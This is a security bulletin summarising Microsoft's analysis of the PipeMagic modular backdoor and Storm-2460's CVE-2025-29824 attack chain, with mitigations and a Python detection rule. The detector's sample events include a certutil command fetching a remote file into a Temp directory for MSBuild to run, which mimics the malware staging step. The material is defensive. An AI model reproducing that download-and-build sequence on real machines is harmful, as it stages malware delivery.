Current Cyber Threats

Dissecting PipeMagic: Inside the Architecture of a Modular Backdoor Framework

Summary:
Microsoft Threat Intelligence released an in-depth report yesterday on PipeMagic, a highly modular backdoor framework that they have observed Storm-2460 employing in multiple instances. Microsoft first observed PipeMagic while researching an attack chain that exploits CVE-2025-29824, an elevation of privilege vulnerability in the Windows Common Log File System (CLFS); Microsoft published a blog on that attack chain in early April 2025. Microsoft has observed Storm-2460 targeting multiple sectors globally, including the IT, financial, and real estate sectors in the US, Europe, South America, and the Middle East. PipeMagic is utilized as part of the pre-exploitation activity in attack chains that also involve CVE-2025-29824. The PipeMagic infection starts with a malicious in-memory dropper disguised as the legitimate open-source ChatGPT Desktop Application. Storm-2460 used the certutil utility to download a file from a previously compromised website acting as a host for the threat actor's malware. This file is a malicious MSBuild file that ultimately drops PipeMagic in memory. After running PipeMagic, Storm-2460 performs the CLFS exploit for privilege escalation and launches its ransomware. PipeMagic uses a named pipe to communicate with its C2 server over TCP to retrieve payload modules. The malware can self-update by storing new modules in memory using a series of doubly linked lists. The lists allow the threat actor to manage the lifecycle of the backdoor's capabilities by staging, executing, and communicating with its various payload modules:
  • Payload linked list: Stores raw payload modules in each node, representing the initial stage of modular deployment.
  • Execute linked list: Contains payload modules that have been successfully loaded into memory and are ready for execution.
  • Network linked list: Contains networking modules responsible for C2 communication.
  • Unknown linked list: Based on Microsoft’s behavioral analysis, they hypothesize it is leveraged dynamically by loaded payloads rather than the core backdoor logic itself.
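The delivery chain described in the summary (certutil fetching a file from a compromised website, then an MSBuild project file dropping the backdoor in memory) leaves a recognizable footprint in process-creation telemetry. The following Python is an added example, not code from the Microsoft report or from this summary. It runs two simple rules over constructed sample events shaped like Sysmon Event ID 1 or EDR process-creation records (pid, parent pid, image path, command line) and escalates to a high-severity alert when a certutil remote fetch and an MSBuild launch of a project file from a user-writable directory share the same parent process. The rule names, the user-writable path list, the sample command lines, and the severity labels are assumptions to tune for your environment; the certutil and MSBuild command lines in the sample are constructed, not indicators taken from the report.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Hypothetical process-creation record; field names mirror the usual
# Sysmon Event ID 1 / EDR fields but are an assumption, not a real schema.
@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # full command line

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Directories a standard user can write to (assumed heuristic list).
USER_WRITABLE_RE = re.compile(
    r"\\(?:Users|AppData|Temp|ProgramData|Public)\\", re.IGNORECASE)
# Anything that looks like a project/XML file argument to MSBuild.
PROJECT_RE = re.compile(r"\S+\.(?:xml|proj|csproj|vbproj)\b", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_certutil_remote_fetch(ev: ProcEvent) -> bool:
    """certutil.exe invoked with a remote URL on its command line."""
    return basename(ev.image) == "certutil.exe" and bool(URL_RE.search(ev.cmdline))


def is_msbuild_from_user_writable(ev: ProcEvent) -> bool:
    """msbuild.exe asked to build a project file stored under a user-writable path."""
    if basename(ev.image) != "msbuild.exe":
        return False
    return any(USER_WRITABLE_RE.search(m.group(0))
               for m in PROJECT_RE.finditer(ev.cmdline))


def detect(events):
    """Return alert dicts for the chain: per-event rules plus a parent-level correlation.

    Events are assumed to be in chronological order, so the correlation requires
    the certutil fetch to precede the MSBuild launch under the same parent.
    """
    alerts = []
    first_fetch_seen = {}          # ppid -> True once a certutil fetch occurred
    correlated = set()
    for ev in events:
        if is_certutil_remote_fetch(ev):
            alerts.append({"severity": "medium", "rule": "certutil_remote_fetch", "pid": ev.pid})
            first_fetch_seen[ev.ppid] = True
        if is_msbuild_from_user_writable(ev):
            alerts.append({"severity": "medium", "rule": "msbuild_user_writable_project", "pid": ev.pid})
            if first_fetch_seen.get(ev.ppid) and ev.ppid not in correlated:
                correlated.add(ev.ppid)
                alerts.append({"severity": "high", "rule": "certutil_fetch_then_msbuild", "pid": ev.ppid})
    return alerts


# Constructed sample events (not real telemetry): one suspicious chain under
# pid 100, plus two benign uses of the same binaries that must not alert.
SAMPLE_EVENTS = [
    ProcEvent(100, 50, r"C:\Windows\System32\cmd.exe", "cmd.exe /c stage.bat"),
    ProcEvent(101, 100, r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -split -f http://example.invalid/update.txt "
              r"C:\Users\jdoe\AppData\Local\Temp\stage.xml"),
    ProcEvent(102, 100, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\Users\jdoe\AppData\Local\Temp\stage.xml"),
    ProcEvent(200, 60, r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -hashfile C:\tools\setup.exe SHA256"),
    ProcEvent(201, 61, r"C:\Program Files\dotnet\MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.csproj /t:Build"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

In a real pipeline the parent-level correlation is the alert worth paging on: certutil fetching from the web and MSBuild building from a temp directory each occur legitimately on developer machines, but the two together under one parent match the staging sequence described above.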
Security Officer Comments:
Microsoft's dissection offers valuable insight into the inner workings of the PipeMagic framework and the TTPs of Storm-2460. The unique use of linked-list data structures to manage the backdoor's many capabilities further reinforces the resourceful nature of Storm-2460. When the backdoor receives a C2 server response, it parses the data and matches it against an extensive list of processing codes, each corresponding to functionality tied to one of the linked lists, to determine the backdoor's response. The PipeMagic backdoor invokes the network module's communication function to transmit system information to the C2 over the established TCP socket. PipeMagic actors likely gather this amalgamation of system info to use as the infected host's unique identifier. Microsoft's recent findings indicate that the now-patched CLFS vulnerability, CVE-2025-29824, is still being actively exploited on unpatched systems. Kaspersky released a blog post on PipeMagic concurrently with the Microsoft Threat Intelligence blog post.

Suggested Corrections:
IOCs are available in the Microsoft report linked below.

Microsoft recommends the following mitigations to reduce the impact of activity associated with PipeMagic and Storm-2460:
  • Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
  • Enable network protection in Microsoft Defender for Endpoint.
  • Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
  • Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. Use Microsoft Defender Vulnerability Management to assess your current status and deploy any updates that might have been missed.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Link(s):
https://www.microsoft.com/en-us/security/blog/2025/08/18/dissecting-pipemagic-inside-the-architecture-of-a-modular-backdoor-framework/